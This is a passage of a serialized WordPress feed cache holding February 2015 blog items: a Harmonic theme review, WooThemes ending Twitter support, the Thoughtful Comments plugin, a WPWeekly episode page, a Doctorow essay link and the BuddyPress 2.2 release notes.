src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/harmonic.png?resize=880%2C660\" alt=\"harmonic\" class=\"aligncenter size-full wp-image-38619\" /></a></p>\n<p>Each section of the scrolling front page has options in the customizer that let you assign a unique display. The customizer allows you to easily set a background for the news, page, widgets, and portfolio sections. You can even include a background shade so that the title and tagline are more readable. The Visibility options allow you to hide any of the sections you&#8217;re not currently using.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/harmonic-customizer.png\" rel=\"prettyphoto[38617]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/harmonic-customizer.png?resize=1025%2C542\" alt=\"harmonic-customizer\" class=\"aligncenter size-full wp-image-38629\" /></a></p>\n<p>Single posts and pages with a featured image will display in a fullscreen design similar to the homepage. The blog archive is available with your choice of a one or two-column layout.</p>\n<p>With the addition of Jetpack, Harmonic also supports site logo upload and a portfolio. The customizer includes options for three different thumbnail aspect ratios, including: landscape (4:3), portrait (3:4), and square (1:1).</p>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/media.jpg\" rel=\"prettyphoto[38617]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/media.jpg?resize=1025%2C748\" alt=\"media\" class=\"aligncenter size-full wp-image-38635\" /></a></p>\n<p>Harmonic includes a custom menu for social links and has support for 16 different social networks. Check out the <a href=\"https://harmonicdemo.wordpress.com/\" target=\"_blank\">live demo</a> on WordPress.com to see the theme in action.</p>\n<p>With the release of <a href=\"https://wordpress.org/themes/harmonic\" target=\"_blank\">Harmonic</a> for self-hosted sites, Automattic now has 60 free themes available in the directory. This theme caters to visual artists and bloggers who have large images to showcase in the background, portfolio, or gallery sections of the site.</p>\n<p>Harmonic is unique in that it transforms featured images and titles into a splash page style intro to single posts. If you want to use images to make a strong impact on your reader, this theme fits the bill. It&#8217;s available on both WordPress.com and self-hosted WordPress sites via the admin themes browser.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 06 Feb 2015 08:19:58 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"Matt: Real NFL Scandal\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44652\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:38:\"http://ma.tt/2015/02/real-nfl-scandal/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1108:\"<blockquote><p>Seattle&#8217;s decision to throw the ball at the goal line with 20 seconds to go in last night&#8217;s Super Bowl was a costly one. But in the long run, it won&#8217;t be nearly as costly to the rest of the United States as the National Football League (NFL) itself.</p>\n<p>Every year, the NFL rakes in around $9.5 billion in revenue. Its commissioner, Roger Goodell, meanwhile, has an annual salary of $44 million. And while those numbers might make sense for any big business, the NFL isn&#8217;t a business &#8211; not technically, at least.</p>\n<p>According to the Public Law 89-800, it&#8217;s a 501(c)6 tax-exempt nonprofit. That&#8217;s right, a nonprofit. In other words, the NFL, one of the most lucrative organizations in all of sports, is subsidized by you and me the taxpayers.</p></blockquote>\n<p>From <a href=\"http://www.truth-out.org/opinion/item/28885-the-real-nfl-scandal\">The Real NFL Scandal</a>. If you&#8217;re curious, here&#8217;s a <a href=\"http://en.wikipedia.org/wiki/Category:501(c)(6)_nonprofit_organizations\">list of other notable 501(c)(6) organizations</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 06 Feb 2015 00:47:45 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"WPTavern: Why WooThemes is Smart to Discontinue Its Twitter Support\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38563\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"http://wptavern.com/why-woothemes-is-smart-to-discontinue-its-twitter-support\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3992:\"<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/woo-support-twitter-account.jpg\" rel=\"prettyphoto[38563]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/woo-support-twitter-account.jpg?resize=1025%2C495\" alt=\"woo-support-twitter-account\" class=\"aligncenter size-full wp-image-38610\" /></a></p>\n<p>WooThemes <a href=\"http://www.woothemes.com/2015/02/retiring-woosupport-twitter/\" target=\"_blank\">announced</a> this week that it will be retiring @WooSupport, its Twitter support account, in favor of other support channels. Social media manager Marina Pape reports that support at the company is otherwise healthy. &#8220;On the contrary, our support is cooking with Customer Happiness this week averaging 90%, all support teams coming in under 24 hours for first-reply time,&#8221; she said.</p>\n<p>WooThemes, like many other WordPress product and service providers, had expanded channels to try to offer support on as many different social channels as possible. Last October, the company <a href=\"http://www.woothemes.com/2014/10/glimpse-world-woosupport/\" target=\"_blank\">announced</a> changes in its support structure:</p>\n<blockquote><p>We&#8217;re opening more and more avenues of communication like the Community, the @WooSupport Twitter handle, and a streamlined Knowledge Base, as well as actively monitoring our social media and ideas boards. You name it, we’re working on it.</p></blockquote>\n<p>Over the past several months, WooThemes has discovered that offering Twitter support is more trouble than it&#8217;s worth. &#8220;Questions get technical and DMs and 140 characters are not ideal facilitators of such things,&#8221; Pape said in the announcement.</p>\n<p>&#8220;Yes, we want to encourage conversation. Yes, we want to have an ear to the ground and be able to help people when the rubber hits the road for them and escalate tickets if people have been waiting for unusually long periods,&#8221; she said. <strong>&#8220;But the truth of the matter is Twitter is not the place to handle support queries and when we try we shoot ourselves in the collective foot.&#8221;</strong></p>\n<p>WooThemes is making a smart move to pull back from a medium that wasn&#8217;t built to handle complex support queries. Instead of spreading staff thin over every social avenue, the company is concentrating on channeling users through an established ticketing system that is already working.</p>\n<p>While anyone can use Twitter for whatever purpose, within its 140 character limit, the brevity that the medium was designed for is not a good fit for managing support. If users find frustration in communicating within Twitter&#8217;s limited capacity, support on this channel is a waste of company time and resources.</p>\n<p>&#8220;But after letting @WooSupport run for a while, we realized what it was actually doing was creating an expectation that we never intended to meet which was that we were able to actually give support over Twitter,&#8221; Pape explained. <strong>&#8220;140 characters are not enough to talk about the weather let alone why your custom-built-million-moving-parts website is breaking.&#8221;</strong></p>\n<p>WooThemes is opting to limit support to its ZenDesk ticketing system, instead of having social media managers playing middleman via tweets. &#8220;DMs on Twitter to get details and sort out problems is akin to birthing pineapples,&#8221; Pape said. Encouraging the ticketing system as the primary avenue of support is a move toward greater efficiency.</p>\n<p>WordPress hosting companies and product/service providers would do well to examine how they are using their various social channels and whether or not some could be trimmed back in favor of more suitable mediums for communication. Cutting out Twitter support may not be the answer for every product or customer demographic, but being &#8220;always on&#8221; and &#8220;always available&#8221; via every channel is not a realistic approach to support.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 05 Feb 2015 20:56:01 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:95:\"WPTavern: Thoughtful Comments Plugin Adds Comment Moderation Links to the Frontend of WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38542\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:105:\"http://wptavern.com/thoughtful-comments-plugin-adds-comment-moderation-links-to-the-frontend-of-wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3054:\"<a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/ThoughfulCommentsFeaturedImage.png\" rel=\"prettyphoto[38542]\"><img class=\"size-full wp-image-38557\" src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/ThoughfulCommentsFeaturedImage.png?resize=669%2C348\" alt=\"Thoughful Comments Featured Image\" /></a>photo credit: <a href=\"http://www.flickr.com/photos/98640399@N08/9410826173\">GirlOnRail_BKGs_BartaIV 1024&#215;768</a> &#8211; <a href=\"https://creativecommons.org/licenses/by/2.0/\">(license)</a>\n<p>The backend of WordPress has a set of tools to help administrators moderate comments, but what if you could bring some of those tools to the frontend? Developed by <a title=\"http://foliovision.com\" href=\"http://foliovision.com\">Foliovision</a>, <a title=\"https://wordpress.org/plugins/thoughtful-comments/\" href=\"https://wordpress.org/plugins/thoughtful-comments/\">Thoughtful Comments</a> is compatible with Jetpack Comments and adds the following links to comments on the frontend of WordPress:</p>\n<ul>\n<li>Approve</li>\n<li>Delete</li>\n<li>Delete Thread</li>\n<li>Delete and Ban IP</li>\n<li>Delete Thread and Ban IP</li>\n</ul>\n<p>Usernames highlighted in red indicate a comment that&#8217;s in the moderation queue. You can either approve, delete, or delete and ban the IP address of moderated comments. It&#8217;s important to note that deleted comments are sent to the trash instead of being removed completely from WordPress. For this reason, I think the Delete link should be renamed to Trash so its function makes more sense.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/CommentInModeration.png\" rel=\"prettyphoto[38542]\"><img class=\"size-full wp-image-38554\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/CommentInModeration.png?resize=708%2C293\" alt=\"Comment in Moderation Status\" /></a>Comment in Moderation Status\n<p>You can also delete entire threads.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/ThoughtfulCommentsLinks.png\" rel=\"prettyphoto[38542]\"><img class=\"size-full wp-image-38555\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/ThoughtfulCommentsLinks.png?resize=640%2C267\" alt=\"Various Administration Links\" /></a>Various Administration Links\n<p>Editing posts, administering comments, and managing a site from the frontend is a huge time saver. With <a title=\"https://wordpress.org/plugins/wp-front-end-editor/\" href=\"https://wordpress.org/plugins/wp-front-end-editor/\">certain aspects of WordPress</a> making their way to the frontend, I wouldn&#8217;t be surprised if one day, the features within Thoughtful Comments end up in core. In the future, I think users will expect to be able to accomplish specific tasks like these without having to browse through clunky administration screens.</p>\n<p>Thoughtful Comments is compatible with WordPress 4.1 and available from the <a title=\"https://wordpress.org/plugins/thoughtful-comments/\" href=\"https://wordpress.org/plugins/thoughtful-comments/\">WordPress plugin directory</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 05 Feb 2015 18:33:53 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:78:\"WPTavern: WPWeekly Episode 178 – A Conversation With Frenemy Brian Krogsgard\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:44:\"http://wptavern.com?p=38572&preview_id=38572\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:84:\"http://wptavern.com/wpweekly-episode-178-a-conversation-with-frenemy-brian-krogsgard\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3687:\"<p>In this episode of WordPress Weekly, <a title=\"http://marcuscouch.com/\" href=\"http://marcuscouch.com/\">Marcus Couch</a> and I are joined by the founder of <a title=\"https://poststatus.com/\" href=\"https://poststatus.com/\">PostStatus</a>, Brian Krogsgard. He explains how his experience writing for WPCandy provided the foundation to launch PostStatus. We find out how well the <a title=\"https://poststatus.com/club/\" href=\"https://poststatus.com/club/\">PostStatus club</a> is doing since launching two weeks ago. Last but not least, we discuss whether or not Krogsgard has the right ingredients to be financially successful in the WordPress content business.</p>\n<h2>Stories Discussed:</h2>\n<p><a title=\"http://wptavern.com/envato-stats-tips-for-getting-things-done-and-more-at-pressnomics-3\" href=\"http://wptavern.com/envato-stats-tips-for-getting-things-done-and-more-at-pressnomics-3\">Recap of PressNomics 3</a><br />\n<a title=\"http://wptavern.com/human-made-acquires-australian-based-wordpress-agency-sennza\" href=\"http://wptavern.com/human-made-acquires-australian-based-wordpress-agency-sennza\">Human Made Acquires Australian Based WordPress Agency Sennza</a><br />\n<a title=\"http://wptavern.com/zero-day-vulnerability-discovered-in-fancybox-for-wordpress-plugin\" href=\"http://wptavern.com/zero-day-vulnerability-discovered-in-fancybox-for-wordpress-plugin\">Zero Day Vulnerability Discovered in Fancybox for WordPress Plugin</a><br />\n<a title=\"http://wptavern.com/buddypress-2-2-spumoni-released-featuring-new-member-type-api\" href=\"http://wptavern.com/buddypress-2-2-spumoni-released-featuring-new-member-type-api\">BuddyPress 2.2 Spumoni Released, Featuring New Member Type API</a></p>\n<h2>Plugins Picked By Marcus:</h2>\n<p><a title=\"https://wordpress.org/plugins/user-roles-and-capabilities/\" href=\"https://wordpress.org/plugins/user-roles-and-capabilities/\">User Roles and Capabilities</a> allows you to manage user roles and capabilities. Using this plugin, you can create new roles and delete existing roles.</p>\n<p><a title=\"https://wordpress.org/plugins/wp-style-kit/\" href=\"https://wordpress.org/plugins/wp-style-kit/\">WP Style Kit</a> is a plugin that adds additional features to the Custom Styles section of the Visual Editor. You can add beautiful custom styles such as, additional headlines, custom bullets, circles, quotes, and call out boxes.</p>\n<p><a title=\"https://wordpress.org/plugins/pet-adoption-listings/\" href=\"https://wordpress.org/plugins/pet-adoption-listings/\">Pet Adoption Listings</a> provides two easy ways to display listings of adoptable pets from a shelter&#8217;s profile at Adopt-a-Pet.com via an iframe.</p>\n<p><a title=\"https://wordpress.org/plugins/login-joomla-users/\" href=\"https://wordpress.org/plugins/login-joomla-users/\">Login Joomla Users</a> allows migrated users from Joomla to login to WordPress. Tested on WordPress 4.1 with users migrated from Joomla 2.5.9. After the first successful login, the password field will automatically be hashed by WordPress.</p>\n<h2>WPWeekly Meta:</h2>\n<p><strong>Next Episode:</strong> Wednesday, February 11th 9:30 P.M. Eastern</p>\n<p><strong>Subscribe To WPWeekly Via Itunes: </strong><a href=\"https://itunes.apple.com/us/podcast/wordpress-weekly/id694849738\" target=\"_blank\">Click here to subscribe</a></p>\n<p><strong>Subscribe To WPWeekly Via RSS: </strong><a href=\"http://www.wptavern.com/feed/podcast\" target=\"_blank\">Click here to subscribe</a></p>\n<p><strong>Subscribe To WPWeekly Via Stitcher Radio: </strong><a href=\"http://www.stitcher.com/podcast/wordpress-weekly-podcast?refid=stpr\" target=\"_blank\">Click here to subscribe</a></p>\n<p><strong>Listen To Episode #178:</strong><br />\n</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 05 Feb 2015 17:33:40 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"Matt: Great Doctorow Essay\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44631\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:42:\"http://ma.tt/2015/02/great-doctorow-essay/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:157:\"<p>Cory Doctorow on <a href=\"http://www.wired.com/2014/12/government-computer-security\">How Laws Restricting Tech Actually Expose Us to Greater Harm</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 05 Feb 2015 05:50:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:10;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"WPTavern: BuddyPress 2.2 Spumoni Released, Featuring New Member Type API\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37925\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:81:\"http://wptavern.com/buddypress-2-2-spumoni-released-featuring-new-member-type-api\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5548:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/l-and-b.jpg\" rel=\"prettyphoto[37925]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/l-and-b.jpg?resize=1025%2C498\" alt=\"l-and-b\" class=\"aligncenter size-full wp-image-38537\" /></a></p>\n<p>BuddyPress 2.2 &#8220;<a href=\"https://buddypress.org/2015/02/buddypress-2-2-spumoni/\" target=\"_blank\">Spumoni</a>&#8221; was released today. The name pays tribute to<a href=\"http://www.spumonigardens.com/\" target=\"_blank\"> L&amp;B Spumoni Gardens</a>, a 70 year old, family-owned pizza joint in Brooklyn, NY. This release is packed full of features that offer developers more flexibility in extending BuddyPress.</p>\n<h2>New Member Type API</h2>\n<p>BuddyPress 2.2 introduces a basic <a href=\"http://wptavern.com/buddypress-2-2-on-track-to-provide-a-basic-member-type-api\" target=\"_blank\">Member Type API</a> that developers can use to create different user types, i.e. student, teacher, etc. This new API is a huge step forward for building niche social networks on top of WordPress. It makes it possible to restrict content, filter the member directory, assign different permissions, etc., based on different member types.</p>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/member-types.png\" rel=\"prettyphoto[37925]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/member-types.png?resize=304%2C173\" alt=\"member-types\" class=\"aligncenter size-full wp-image-38546\" /></a></p>\n<p>The API does nothing visible for users in this first iteration but can be utilized to create plugins that register different member types and build out further capabilities from there. Admins will be able to change a user&#8217;s member type, which is currently limited to one, via a new meta box that is added to the community profile screen.</p>\n<h2>Custom Post Type Support Added to the Activity Stream</h2>\n<p>Custom post type support for the activity stream is a major feature that has been <a href=\"https://buddypress.trac.wordpress.org/ticket/3460\" target=\"_blank\">three years in the making</a>. Developers can now add support for their post types to be tracked in the activity stream in the same way that updates appear for regular posts via the blogs component. Adding support for CPTs is as simple as including one line of code:</p>\n<pre class=\"brush: php; light: true; title: ; notranslate\">add_post_type_support( \'book\', \'buddypress-activity\' );</pre>\n<p>Note that this feature isn&#8217;t automatically turned on &#8211; a custom post type must declare support for it. The single line of code will add a generic update that can be further customized via arguments added when registering the post type. Comment support for CPT activity items is also optional.</p>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2014/12/cpt-activity.png\" rel=\"prettyphoto[37925]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2014/12/cpt-activity.png?resize=1025%2C326\" alt=\"cpt-activity\" class=\"aligncenter size-full wp-image-35302\" /></a></p>\n<p>Custom post types with activity stream support can then be easily sorted via the activity dropdown filters:</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2014/12/activity-dropdown.png\" rel=\"prettyphoto[37925]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2014/12/activity-dropdown.png?resize=1025%2C366\" alt=\"activity-dropdown\" class=\"aligncenter size-full wp-image-35299\" /></a></p>\n<p>Check out the BuddyPress codex for more information on <a href=\"https://codex.buddypress.org/plugindev/post-types-activities/#adding-the-buddypress-support-and-specific-labels-at-post-type-registration\" target=\"_blank\">how to customize activity attributes</a> when registering a custom post type.</p>\n<p>This release also <a href=\"http://wptavern.com/buddypress-2-2-will-add-support-for-composer\" target=\"_blank\">adds support for Composer</a>. BuddyPress will soon be listed at <a href=\"https://packagist.org/\" target=\"_blank\">Packagist.org</a> now that the official release is out.</p>\n<p>Other notable features and improvements include:</p>\n<ul>\n<li>Several new query API’s (based on WordPress improvements) for retrieving more specific results</li>\n<li>Continued cache enhancements, particularly for multi-site and multi-network WordPress configurations</li>\n<li>Message Meta – Private message conversations are now more flexible with an additional metadata table</li>\n<li>The Activity and Extended Profiles components now support advanced conditional logic, like nested clauses and multiple operators — A AND ( B OR C ). The Activity component now also supports querying by multiple scopes.</li>\n<li>Mentions: Better support for responsive devices</li>\n<li>Improved UI for managing messages, new “Read/Unread” links for each message thread, better bulk message management</li>\n<li>Numerous improvements to the Legacy template pack</li>\n<li>Increased coverage of inline code documentation, actions, and filters</li>\n</ul>\n<p>Check out the full list of improvements on the <a href=\"https://codex.buddypress.org/releases/version-2-2/\" target=\"_blank\">2.2 version page</a> in the codex.</p>\n<p>BuddyPress 2.2 is the result of several months of hard work from 44 contributors. The new features in this release enable the plugin to be more flexible for building niche social networks with different user types and custom content types integrated into the activity stream. The official BuddyPress 2.2 update is now available via the WordPress admin.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 05 Feb 2015 00:26:28 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:11;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:45:\"Post Status: WordPress lead developer 